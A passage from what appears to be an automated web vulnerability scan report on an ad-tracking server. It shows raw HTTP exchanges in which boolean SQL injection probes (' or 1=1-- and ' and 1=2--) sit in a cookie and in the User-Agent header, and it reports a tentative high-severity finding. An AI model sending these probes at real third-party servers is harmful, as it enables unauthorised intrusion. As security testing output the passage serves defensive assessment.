u20000000y3m0316aulkze3o000000023m0215k9lkxlm50000000a3m0316atlkxlm50000000a3m031203lkb5u20000000y3m03163clkxlm50000000a3m031204lkkyy00000000j3m030afqlkze3o000000023m020o0vlkkpqx0000000m3m030z2ilkkxrb0000000k3m0313ovlkxrxz000000043m03'%20and%201%3d1--%20; sglst=2280sbpelkxlm50000000a3m030k0a50adsnlkxlm5006bu00a3m030k0a50aarllkxlm5006bu00a3m030k0a50acg5lkxlm5006bu00a3m030k0a50a9rslkkpke0d2dl00s3m030k0b50sam5lkkxr8002zw00l3m030k0b50lcd4lkxlm5006bu00a3m030k0a50acrglkxlm5006bu00a3m030k0a50acnolkxlm5006bu00a3m030k0a50aabelkxlm5006bu00a3m030k0a50add8lkxlm5006bu00a3m030k0a50acy2lkxlm5006bu00a3m030k0a50aaoplkb5u209jqc0063e000j00500cnxlkxlm50000000a3m030k0a50abq3lkxlm5006bu00a3m030k0a50abvplkxlm5006bu00a3m030k0a50aaoilkxlm5006bu00a3m030k0a50a942lkb5u20mfs300o3l000k005008ndlkb5u20mfs300o3l000k005009ullkxlm5006bu00a3m030k0a50abvclkxlm5006bu00a3m030k0a50ac5flkxlm5006bu00a3m030k0a50a56blkb5u20mfs300o3l000k00500bjqlkxlm5006bu00a3m030k0a50aawklkxlm5006bu00a3m030k0a50aasulkb5u209jqc0063e000j00500crplkxlm5006bu00a3m030k0a50aasqlkxlm5006bu00a3m030k0a50ac5rlkov6e0000000d3m030k0b50daw8lkxlm5006bu00a3m030k0a50ac60lkxlm5006bu00a3m030k0a50adc4lkxlm5006bu00a3m030k0a50ad26lkxlm5006bu00a3m030k0a50adnjlkxlm5006bu00a3m030k0a50abrilkxlm5006bu00a3m030k0a50acbclkxlm5006bu00a3m030k0a50ac85lkxlm5006bu00a3m030k0a50acsslkxlm5006bu00a3m030k0a50ac80lkb5u209jqc0063e000j00500ag2lkd7nq0m6g700x3m030k0b50uc1elkxlm5006bu00a3m030k0a50ac81lkkpke0cw1r00i3l000k005009grlkxlm5006bu00a3m030k0a50ac8flkxlm5006bu00a3m030k0a50aa6slkkpke0cw1r00i3l000k00500dnalkxlm5006bu00a3m030k0a50a9z6lkxlm50000000a3m030k0a50adbtlkxlm5006bu00a3m030k0a50adyllkxlm5006bu00a3m030k0a50a0kllklhm40c4010053l000k005009q4lkxlm5006bu00a3m030k0a50a9q5lkb5u20mfs300o3l000k00500b3zlkxlm5006bu00a3m030k0a50a0t7ljyxb410gst0153m030k0b50udgflkkpke0d2dl00s3m030k0b50s9mjlkxlm50000000a3m030k0a50abo0lkb5u20mm3x00y3m030k0b50ubo1lkkyy00cmo50093l000k005009pglkxlm5006bu00a3m030k0a50acwalkxlm5006bu00a3m030k0a50ad86lklhm40c4010053l000k00500d84lkxlm5006bu00a3m030k0a50adqllkxlm5006bu00a3m030k0a50adz3lkxlm5006bu00a3m030k0a50acm6lkxlm5006bu00a3m030k0a50acxdlkxlm5006bu00a3m030k0a50a719lkb5u20mm3x00g3m030k0a50b71alkkpke0cw1r00i3l000k00500ctplkxlm5006bu00a3m030k0a50acc3lkxlm5006bu00a3m030k0a50adgilkb5u209jqc0063e000j00500cthlkxlm5006bu00a3m030k0a50a4wclkb5u20mm3x00g3m030k0a50b8eklkkpke0cw1r00i3l000k005005mrlkb5u20mfs300o3l000k00500a0ulkxlm5006bu00a3m030k0a50aarilkxlm50000000a3m030k0a50abwjlkkyy00cszz00j3m030k0b50jcbplkxlm5006bu00a3m030k0a50a9gelkxlm5006bu00a3m030k0a50a; vstcnt=417k010r164slly127p10f24exp6103210e24tc6l103210e249v4u10pj10e24ru4y103210722te10tq10a24f69z103210f24tmhw103210924n86o103210d24pq44103210a24eflo218e104203210724na8i103210e24eyja103210e24mqca103210e24nsyl103210f24jxig103210f24f9wk103210i24fvio218e20e20f203210f24uzpw118e10f24l16a118e10f24fz24103210924e8bw103210824fsuv103210924fduc218e10a203210e24dret103210724uzdp103210b24gqhl103210923sti21hj10a203210e24cnyl103210g24styu10321092451gt10pj10e24fj52103210924o2lt103210a24nnav103210f24m1v2103210a24f7qr218e108203210924uzg6218e100203210024fgv9218e108203210a24tfmw103210b24hqyp103210i24kd6k103210c23l4f103210a2

Response 1

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=1lkkxr816054tmb012v701QWYNRLUMp00egcp4tm3012v701QWJzhCSHC00egcf52rc011qy01mLlY5BlsL003xfa4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; Domain=media6degrees.com; Expires=Sun, 06-Nov-2011 13:35:42 GMT; Path=/
Set-Cookie: clid=2ljtllp01170xrd52zkwjuxh15tht0193m040k0c50v; Domain=media6degrees.com; Expires=Sun, 06-Nov-2011 13:35:42 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rdrlst=43m157rlklhm40000000g3m040pahlkze3o000000033m03157olkxlm50000000b3m04144qlkze3o000000033m0313y7lkze3o000000033m030hsnlkze3o000000033m0315sklkkpqq0000000o3m040x1blkkpqq0000000o3m0412nslkxrxz000000053m040hsplkkpqq0000000o3m0412gdlkkyy00000000k3m040morlkkxrb0000000l3m0414k6lkxlm50000000b3m040w35lkze3o000000033m0313pylkze3o000000033m0314rwlkxlm50000000b3m041628lkzf3i000000013m0114khlkxlm50000000b3m041196lkkkbe0000000u3m0413x4lkxrxz000000053m0413qmlkzf3i000000013m011195lkkpqh0000000p3m041194lkkjj40000000v3m040dlxlkb5u20000000z3m0416nulkxlm50000000b3m0413q8lkzf3i000000013m011193lkkplo0000000r3m04008slklhm40000000g3m041192lkkpke0000000t3m040p46lkkpqq0000000o3m040zg4lkzf3i000000013m010moylkl0r50000000h3m0416oilkxlm50000000b3m04144elkze3o000000033m0310poljyxb4000000163m0412ftlkxrxz000000053m040e6llkl0r50000000h3m0416dnlkze3o000000033m03138olkxrxz000000053m04167ulkxq41000000063m04159olk8fax000000113m0414qllkxlm50000000b3m0415halkxlm50000000b3m040m0ulkl0r50000000h3m040m0plkkxrb0000000l3m0416e6lkxnbq0000000a3m0413zblkzf3i000000013m0114xnlkxlm50000000b3m04167blkl0r50000000h3m0416dxlkze3o000000033m031391lkxrxz000000053m0415zhlkzf3i000000013m011672lkkxrb0000000l3m040ycrlkncow0000000f3m04158mlkze3o000000033m030okclkze3o000000033m031015lkzf3i000000013m0113lelkxrxz000000053m0413yolkze3o000000033m03137rlkkpqq0000000o3m040ojulkze3o000000033m031240lkxrxz000000053m0414ozlkxlm50000000b3m0414bmlkxrxz000000053m0414j7lkxlm50000000b3m0414bzlkxlm50000000b3m040ni1lkb5u20000000z3m0411pjlkxrxz000000053m040p01
...[SNIP]...

Request 2

GET /orbserv/hbjs?pixId=5129&pcv=36 HTTP/1.1
Host: map.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://ad.media6degrees.com/adserv/cs?tId=4602020164879145|cb=1305033257|adType=iframe|cId=5902|ec=1|spId=30812|advId=1209|exId=21|price=2.133250|pubId=625|secId=414|invId=3715|notifyServer=asd163.sd.pl.pvt|notifyPort=8080|bid=1.75|srcUrlEnc=http%3A%2F%2Fletters.salon.com%2Fpolitics%2Fwar_room%2F2011%2F05%2F09%2Fsantorum_loser%2Fview%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=AC4E503D48FE2CEEC5068B639D61E649; ipinfo=2lkkjj40zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=016020a0e0f0g0h1ljtllpxzt1146caxzt1tr37xzt1tr37xzt1146caxzt113zye; adh=1lkkxr816054tmb012v701QWYNRLUMp00egcp4tm3012v701QWJzhCSHC00egcf52rc011qy01mLlY5BlsL003xfa4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; clid=2ljtllp01170xrd52zkwjuxh15si80183m030k0b50u; rdrlst=43c0pahlkze3o000000023m02157rlklhm40000000f3m03144qlkze3o000000023m02157olkxlm50000000a3m0313y7lkze3o000000023m0215sklkkpqq0000000n3m030hsnlkze3o000000023m0212nslkxrxz000000043m030x1blkkpqq0000000n3m030hsplkkpqq0000000n3m0312gdlkkyy00000000j3m030morlkkxrb0000000k3m0314k6lkxlm50000000a3m030w35lkze3o000000023m0213pylkze3o000000023m0214rwlkxlm50000000a3m0314khlkxlm50000000a3m031196lkkkbe0000000t3m0313x4lkxrxz000000043m031195lkkpqh0000000o3m031194lkkjj40000000u3m030dlxlkb5u20000000y3m0316nulkxlm50000000a3m031193lkkplo0000000q3m030p46lkkpqq0000000n3m031192lkkpke0000000s3m03008slklhm40000000f3m0316oilkxlm50000000a3m030moylkl0r50000000g3m03144elkze3o000000023m0212ftlkxrxz000000043m0310poljyxb4000000153m030e6llkl0r50000000g3m03138olkxrxz000000043m0316dnlkze3o000000023m02167ulkxq41000000053m0314qllkxlm50000000a3m03159olk8fax000000103m0315halkxlm50000000a3m030m0ulkl0r50000000g3m030m0plkkxrb0000000k3m0316e6lkxnbq000000093m0314xnlkxlm50000000a3m03167blkl0r50000000g3m0316dxlkze3o000000023m021391lkxrxz000000043m031672lkkxrb0000000k3m030ycrlkncow0000000e3m03158mlkze3o000000023m020okclkze3o000000023m0213lelkxrxz000000043m0313yolkze3o000000023m02137rlkkpqq0000000n3m030ojulkze3o000000023m021240lkxrxz000000043m0314ozlkxlm50000000a3m0314bmlkxrxz000000043m0314j7lkxlm50000000a3m0314bzlkxlm50000000a3m030ni1lkb5u20000000y3m0311pjlkxrxz000000043m030p01lkze3o000000023m0215holkxlm50000000a3m030m7alkkxrb0000000k3m0313mklkxrxz000000043m030m7flkkyyl0000000i3m03101ulkze3o000000023m020zoklkze3o000000023m0212zglkxrxz000000043m0313lxlkxrxz000000043m030zp4lkze3o000000023m02148ilkxlm50000000a3m030xvclkze3o000000023m0212yxlkxrxz000000043m0315iglkxq0l000000063m0316s2lkxpyu000000073m0314hplkxlm50000000a3m030znmlk3462000000133m0314hclkxlm50000000a3m030wd7lkze3o000000023m02102plkxrxz000000043m0310tylkkpku0000000r3m030p1blkb5u20000000y3m030p1alkze3o000000023m0200bvlk9pe80000000z3m0315xylk60qe000000123m0310lxlkxrxz000000043m03103blkxrxz000000043m0310telkd7nq0000000x3m0316rslkxppm000000083m030c9slk9pe80000000z3m0313mxlkze3o000000023m0212emlkze3o000000023m0210rdlkdkly0000000v3m03126qlkxrxz000000043m030mj2lkkxrb0000000k3m030kualkkpqq0000000n3m03163plkxlm50000000a3m030z9xlkze3o000000023m020m45lkl0r50000000g3m030m40lkkxrb0000000k3m030zqylkxrxz000000043m030mjelkkxrb0000000k3m0312qnlkkplt0000000p3m030ovslkze3o000000023m0212x6lkxrxz000000043m030bo8lkb5u20000000y3m0314e9lkze3o000000023m020mjjlkl0r50000000g3m030lw5lkb5u20000000y3m0316aulkze3o000000023m0215k9lkxlm50000000a3m0316atlkxlm50000000a3m031203lkb5u20000000y3m03163clkxlm50000000a3m031204lkkyy00000000j3m030afqlkze3o000000023m020o0vlkkpqx0000000m3m030z2ilkkxrb0000000k3m0313ovlkxrxz000000043m03'%20and%201%3d2--%20; sglst=2280sbpelkxlm50000000a3m030k0a50adsnlkxlm5006bu00a3m030k0a50aarllkxlm5006bu00a3m030k0a50acg5lkxlm5006bu00a3m030k0a50a9rslkkpke0d2dl00s3m030k0b50sam5lkkxr8002zw00l3m030k0b50lcd4lkxlm5006bu00a3m030k0a50acrglkxlm5006bu00a3m030k0a50acnolkxlm5006bu00a3m030k0a50aabelkxlm5006bu00a3m030k0a50add8lkxlm5006bu00a3m030k0a50acy2lkxlm5006bu00a3m030k0a50aaoplkb5u209jqc0063e000j00500cnxlkxlm50000000a3m030k0a50abq3lkxlm5006bu00a3m030k0a50abvplkxlm5006bu00a3m030k0a50aaoilkxlm5006bu00a3m030k0a50a942lkb5u20mfs300o3l000k005008ndlkb5u20mfs300o3l000k005009ullkxlm5006bu00a3m030k0a50abvclkxlm5006bu00a3m030k0a50ac5flkxlm5006bu00a3m030k0a50a56blkb5u20mfs300o3l000k00500bjqlkxlm5006bu00a3m030k0a50aawklkxlm5006bu00a3m030k0a50aasulkb5u209jqc0063e000j00500crplkxlm5006bu00a3m030k0a50aasqlkxlm5006bu00a3m030k0a50ac5rlkov6e0000000d3m030k0b50daw8lkxlm5006bu00a3m030k0a50ac60lkxlm5006bu00a3m030k0a50adc4lkxlm5006bu00a3m030k0a50ad26lkxlm5006bu00a3m030k0a50adnjlkxlm5006bu00a3m030k0a50abrilkxlm5006bu00a3m030k0a50acbclkxlm5006bu00a3m030k0a50ac85lkxlm5006bu00a3m030k0a50acsslkxlm5006bu00a3m030k0a50ac80lkb5u209jqc0063e000j00500ag2lkd7nq0m6g700x3m030k0b50uc1elkxlm5006bu00a3m030k0a50ac81lkkpke0cw1r00i3l000k005009grlkxlm5006bu00a3m030k0a50ac8flkxlm5006bu00a3m030k0a50aa6slkkpke0cw1r00i3l000k00500dnalkxlm5006bu00a3m030k0a50a9z6lkxlm50000000a3m030k0a50adbtlkxlm5006bu00a3m030k0a50adyllkxlm5006bu00a3m030k0a50a0kllklhm40c4010053l000k005009q4lkxlm5006bu00a3m030k0a50a9q5lkb5u20mfs300o3l000k00500b3zlkxlm5006bu00a3m030k0a50a0t7ljyxb410gst0153m030k0b50udgflkkpke0d2dl00s3m030k0b50s9mjlkxlm50000000a3m030k0a50abo0lkb5u20mm3x00y3m030k0b50ubo1lkkyy00cmo50093l000k005009pglkxlm5006bu00a3m030k0a50acwalkxlm5006bu00a3m030k0a50ad86lklhm40c4010053l000k00500d84lkxlm5006bu00a3m030k0a50adqllkxlm5006bu00a3m030k0a50adz3lkxlm5006bu00a3m030k0a50acm6lkxlm5006bu00a3m030k0a50acxdlkxlm5006bu00a3m030k0a50a719lkb5u20mm3x00g3m030k0a50b71alkkpke0cw1r00i3l000k00500ctplkxlm5006bu00a3m030k0a50acc3lkxlm5006bu00a3m030k0a50adgilkb5u209jqc0063e000j00500cthlkxlm5006bu00a3m030k0a50a4wclkb5u20mm3x00g3m030k0a50b8eklkkpke0cw1r00i3l000k005005mrlkb5u20mfs300o3l000k00500a0ulkxlm5006bu00a3m030k0a50aarilkxlm50000000a3m030k0a50abwjlkkyy00cszz00j3m030k0b50jcbplkxlm5006bu00a3m030k0a50a9gelkxlm5006bu00a3m030k0a50a; vstcnt=417k010r164slly127p10f24exp6103210e24tc6l103210e249v4u10pj10e24ru4y103210722te10tq10a24f69z103210f24tmhw103210924n86o103210d24pq44103210a24eflo218e104203210724na8i103210e24eyja103210e24mqca103210e24nsyl103210f24jxig103210f24f9wk103210i24fvio218e20e20f203210f24uzpw118e10f24l16a118e10f24fz24103210924e8bw103210824fsuv103210924fduc218e10a203210e24dret103210724uzdp103210b24gqhl103210923sti21hj10a203210e24cnyl103210g24styu10321092451gt10pj10e24fj52103210924o2lt103210a24nnav103210f24m1v2103210a24f7qr218e108203210924uzg6218e100203210024fgv9218e108203210a24tfmw103210b24hqyp103210i24kd6k103210c23l4f103210a2

Response 2

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=1lkkxr816054tmb012v701QWYNRLUMp00egcp4tm3012v701QWJzhCSHC00egcf52rc011qy01mLlY5BlsL003xfa4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; Domain=media6degrees.com; Expires=Sun, 06-Nov-2011 13:35:43 GMT; Path=/
Set-Cookie: clid=2ljtllp01170xrd52zkwjuxh15thu0193m040k0c50v; Domain=media6degrees.com; Expires=Sun, 06-Nov-2011 13:35:43 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rdrlst=43m157rlklhm40000000g3m040pahlkze3o000000033m03157olkxlm50000000b3m04144qlkze3o000000033m0313y7lkze3o000000033m030hsnlkze3o000000033m0315sklkkpqq0000000o3m040x1blkkpqq0000000o3m0412nslkxrxz000000053m040hsplkkpqq0000000o3m0412gdlkkyy00000000k3m040morlkkxrb0000000l3m0414k6lkxlm50000000b3m040w35lkze3o000000033m0313pylkze3o000000033m0314rwlkxlm50000000b3m041628lkzf3j000000013m0114khlkxlm50000000b3m041196lkkkbe0000000u3m0413x4lkxrxz000000053m0413qmlkzf3j000000013m011195lkkpqh0000000p3m041194lkkjj40000000v3m040dlxlkb5u20000000z3m0416nulkxlm50000000b3m0413q8lkzf3j000000013m011193lkkplo0000000r3m04008slklhm40000000g3m041192lkkpke0000000t3m040p46lkkpqq0000000o3m040zg4lkzf3j000000013m010moylkl0r50000000h3m0416oilkxlm50000000b3m04144elkze3o000000033m0310poljyxb4000000163m0412ftlkxrxz000000053m040e6llkl0r50000000h3m0416dnlkze3o000000033m03138olkxrxz000000053m04167ulkxq41000000063m04159olk8fax000000113m0414qllkxlm50000000b3m0415halkxlm50000000b3m040m0ulkl0r50000000h3m040m0plkkxrb0000000l3m0416e6lkxnbq0000000a3m0413zblkzf3j000000013m0114xnlkxlm50000000b3m04167blkl0r50000000h3m0416dxlkze3o000000033m031391lkxrxz000000053m0415zhlkzf3j000000013m011672lkkxrb0000000l3m040ycrlkncow0000000f3m04158mlkze3o000000033m030okclkze3o000000033m031015lkzf3j000000013m0113lelkxrxz000000053m0413yolkze3o000000033m03137rlkkpqq0000000o3m040ojulkze3o000000033m031240lkxrxz000000053m0414ozlkxlm50000000b3m0414bmlkxrxz000000053m0414j7lkxlm50000000b3m0414bzlkxlm50000000b3m040ni1lkb5u20000000z3m0411pjlkxrxz000000053m040p01
...[SNIP]...

1.11. http://map.media6degrees.com/orbserv/hbpix [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://map.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payloads 83126303'%20or%201%3d1--%20 and 83126303'%20or%201%3d2--%20 were each submitted in the User-Agent HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /orbserv/hbpix?pixId=2869&curl=http%3A%2F%2Fwww.washingtonpost.com%2F%2Fvendor%2Fsurvey-gizmo.jsp%3FpollURL%3Dhttp%3A%2F%2Fwww.surveygizmo.com%2Fs3%2Fpolljs%26pollID%3D539472-DPU5JRD6BN7QFZ9AI8X6B82W22I59H HTTP/1.1
Host: map.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com//vendor/survey-gizmo.jsp?pollURL=http://www.surveygizmo.com/s3/polljs&pollID=539472-DPU5JRD6BN7QFZ9AI8X6B82W22I59H
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.2483126303'%20or%201%3d1--%20
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=3EE51B53765DEA0EE049F10383DA89D7; ipinfo=2lkkjj40zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=016020a0e0f0g0h1ljtllpxzt1146caxzt1tr37xzt1tr37xzt1146caxzt113zye; adh=1lkkxr816054tmb012v701QWYNRLUMp00egcp4tm3012v701QWJzhCSHC00egcf52rc011qy01mLlY5BlsL003xfa4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; clid=2ljtllp01170xrd52zkwjuxh15si90193m040k0c50v; rdrlst=43m157rlklhm40000000g3m040pahlkze3o000000033m03157olkxlm50000000b3m04144qlkze3o000000033m0313y7lkze3o000000033m030hsnlkze3o000000033m0315sklkkpqq0000000o3m040x1blkkpqq0000000o3m0412nslkxrxz000000053m040hsplkkpqq0000000o3m0412gdlkkyy00000000k3m040morlkkxrb0000000l3m0414k6lkxlm50000000b3m040w35lkze3o000000033m0313pylkze3o000000033m0314rwlkxlm50000000b3m041628lkze3y000000013m0114khlkxlm50000000b3m041196lkkkbe0000000u3m0413x4lkxrxz000000053m0413qmlkze3y000000013m011195lkkpqh0000000p3m041194lkkjj40000000v3m040dlxlkb5u20000000z3m0416nulkxlm50000000b3m0413q8lkze3y000000013m011193lkkplo0000000r3m04008slklhm40000000g3m041192lkkpke0000000t3m040p46lkkpqq0000000o3m040zg4lkze3y000000013m010moylkl0r50000000h3m0416oilkxlm50000000b3m04144elkze3o000000033m0310poljyxb4000000163m0412ftlkxrxz000000053m040e6llkl0r50000000h3m0416dnlkze3o000000033m03138olkxrxz000000053m04167ulkxq41000000063m04159olk8fax000000113m0414qllkxlm50000000b3m0415halkxlm50000000b3m040m0ulkl0r50000000h3m040m0plkkxrb0000000l3m0416e6lkxnbq0000000a3m0413zblkze3y000000013m0114xnlkxlm50000000b3m04167blkl0r50000000h3m0416dxlkze3o000000033m031391lkxrxz000000053m0415zhlkze3y000000013m011672lkkxrb0000000l3m040ycrlkncow0000000f3m04158mlkze3o000000033m030okclkze3o000000033m031015lkze3y000000013m0113lelkxrxz000000053m0413yolkze3o000000033m03137rlkkpqq0000000o3m040ojulkze3o000000033m031240lkxrxz000000053m0414ozlkxlm50000000b3m0414bmlkxrxz000000053m0414j7lkxlm50000000b3m0414bzlkxlm50000000b3m040ni1lkb5u20000000z3m0411pjlkxrxz000000053m040p01lkze3o000000033m0315holkxlm50000000b3m040m7alkkxrb0000000l3m0413mklkxrxz000000053m040m7flkkyyl0000000j3m04101ulkze3o000000033m030zoklkze3o000000033m0312zglkxrxz000000053m0413lxlkxrxz000000053m040zp4lkze3o000000033m03148ilkxlm50000000b3m040xvclkze3o000000033m0312yxlkxrxz000000053m0415iglkxq0l000000073m0413n7lkze3y000000013m0116s2lkxpyu000000083m0414hplkxlm50000000b3m040znmlk3462000000143m0414hclkxlm50000000b3m040wd7lkze3o000000033m03102plkxrxz000000053m0410tylkkpku0000000s3m040p1blkb5u20000000z3m040p1alkze3o000000033m0300bvlk9pe8000000103m0415xylk60qe000000133m0410lxlkxrxz000000053m04103blkxrxz000000053m0410telkd7nq0000000y3m0416rslkxppm000000093m040c9slk9pe8000000103m0413mxlkze3o000000033m0312emlkze3o000000033m0310rdlkdkly0000000w3m04126qlkxrxz000000053m040mj2lkkxrb0000000l3m040kualkkpqq0000000o3m040z9zlkze3y000000013m01163plkxlm50000000b3m040z9xlkze3o000000033m030m45lkl0r50000000h3m040m40lkkxrb0000000l3m040zqylkxrxz000000053m040mjelkkxrb0000000l3m0412qnlkkplt0000000q3m040ovslkze3o000000033m0314e9lkze3o000000033m030bo8lkb5u20000000z3m0412x6lkxrxz000000053m040mjjlkl0r50000000h3m041342lkze3y000000013m010lw5lkb5u20000000z3m0416aulkze3o000000033m0316atlkxlm50000000b3m0415k9lkxlm50000000b3m041203lkb5u20000000z3m041204lkkyy00000000k3m04163clkxlm50000000b3m040afqlkze3o000000033m030o0vlkkpqx0000000n3m040z2ilkkxrb0000000l3m0413ovlkxrxz000000053m04; sglst=2280sbpelkxlm50000000b3m040k0b50bdsnlkxlm5006bu00b3m040k0b50barllkxlm5006bu00b3m040k0b50bcg5lkxlm5006bu00b3m040k0b50b9rslkkpke0d2dl00t3m040k0c50tam5lkkxr8002zw00m3m040k0c50mcd4lkxlm5006bu00b3m040k0b50bcrglkxlm5006bu00b3m040k0b50bcnolkxlm5006bu00b3m040k0b50babelkxlm5006bu00b3m040k0b50bdd8lkxlm5006bu00b3m040k0b50bcy2lkxlm5006bu00b3m040k0b50baoplkb5u209jqc0063e000j00500cnxlkxlm50000000b3m040k0b50bbq3lkxlm5006bu00b3m040k0b50baoilkxlm5006bu00b3m040k0b50bbvplkxlm5006bu00b3m040k0b50b942lkb5u20mfs300o3l000k005009ullkxlm5006bu00b3m040k0b50b8ndlkb5u20mfs300o3l000k00500bvclkxlm5006bu00b3m040k0b50bc5flkxlm5006bu00b3m040k0b50b56blkb5u20mfs300o3l000k00500bjqlkxlm5006bu00b3m040k0b50bawklkxlm5006bu00b3m040k0b50basulkb5u209jqc0063e000j00500crplkxlm5006bu00b3m040k0b50basqlkxlm5006bu00b3m040k0b50bc5rlkov6e0000000e3m040k0c50eaw8lkxlm5006bu00b3m040k0b50bc60lkxlm5006bu00b3m040k0b50bdc4lkxlm5006bu00b3m040k0b50bd26lkxlm5006bu00b3m040k0b50bdnjlkxlm5006bu00b3m040k0b50bbrilkxlm5006bu00b3m040k0b50bcbclkxlm5006bu00b3m040k0b50bc85lkxlm5006bu00b3m040k0b50bcsslkxlm5006bu00b3m040k0b50bc80lkb5u209jqc0063e000j00500ag2lkd7nq0m6g800y3m040k0c50vc1elkxlm5006bu00b3m040k0b50bc81lkkpke0cw1r00i3l000k005009grlkxlm5006bu00b3m040k0b50bc8flkxlm5006bu00b3m040k0b50ba6slkkpke0cw1r00i3l000k00500dnalkxlm5006bu00b3m040k0b50b9z6lkxlm50000000b3m040k0b50bdbtlkxlm5006bu00b3m040k0b50b9q4lkxlm5006bu00b3m040k0b50b0kllklhm40c4010053l000k00500dyllkxlm5006bu00b3m040k0b50bb3zlkxlm5006bu00b3m040k0b50b9q5lkb5u20mfs300o3l000k005009mjlkxlm50000000b3m040k0b50bdgflkkpke0d2dl00t3m040k0c50t0t7ljyxb410gsu0163m040k0c50vbo0lkb5u20mm3x00z3m040k0c50vbo1lkkyy00cmo50093l000k005009pglkxlm5006bu00b3m040k0b50bd86lklhm40c4010053l000k00500cwalkxlm5006bu00b3m040k0b50bdqllkxlm5006bu00b3m040k0b50bd84lkxlm5006bu00b3m040k0b50bdz3lkxlm5006bu00b3m040k0b50bcm6lkxlm5006bu00b3m040k0b50bcxdlkxlm5006bu00b3m040k0b50b719lkb5u20mm3x00h3m040k0b50c71alkkpke0cw1r00i3l000k00500ctplkxlm5006bu00b3m040k0b50bcc3lkxlm5006bu00b3m040k0b50bdgilkb5u209jqc0063e000j00500cthlkxlm5006bu00b3m040k0b50b4wclkb5u20mm3x00h3m040k0b50ca0ulkxlm5006bu00b3m040k0b50b5mrlkb5u20mfs300o3l000k005008eklkkpke0cw1r00i3l000k00500arilkxlm50000000b3m040k0b50bcbplkxlm5006bu00b3m040k0b50bbwjlkkyy00cszz00k3m040k0c50k9gelkxlm5006bu00b3m040k0b50b; vstcnt=417k010r164slly127p10f24exp6103210e24tc6l103210e24ru4y1032107249v4u10pj10e22te10tq10a24tmhw103210924f69z103210f24pq44103210a24n86o103210d24eflo218e104203210724eyja103210e24na8i103210e24mqca103210e24nsyl103210f24jxig103210f24f9wk103210i24fvio218e20e20f203210f24uzpw118e10f24l16a118e10f24fz24103210924e8bw103210824fsuv103210924fduc218e10a203210e24uzdp103210b24dret103210724gqhl103210923sti21hj10a203210e2451gt10pj10e24styu103210924cnyl103210g24o2lt103210a24fj52103210924nnav103210f24m1v2103210a24f7qr218e108203210924uzg6218e100203210024fgv9218e108203210a24tfmw103210b23l4f103210a24kd6k103210c24hqyp103210i2

Response 1

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: acs=016020a0e0f0g0h1ljtllpxzt115tzpxzt1tr37xzt1tr37xzt115tzpxzt113zye; Domain=media6degrees.com; Expires=Sun, 06-Nov-2011 13:46:27 GMT; Path=/
Set-Cookie: adh=1lkkxr816054tmb012v701QWYNRLUMp00egcp4tm3012v701QWJzhCSHC00egcf52rc011qy01mLlY5BlsL003xfa4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; Domain=media6degrees.com; Expires=Sun, 06-Nov-2011 13:46:27 GMT; Path=/
Set-Cookie: clid=2ljtllp01170xrd52zkwjuxh15tzp01a3m050k0d50w; Domain=media6degrees.com; Expires=Sun, 06-Nov-2011 13:46:27 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: 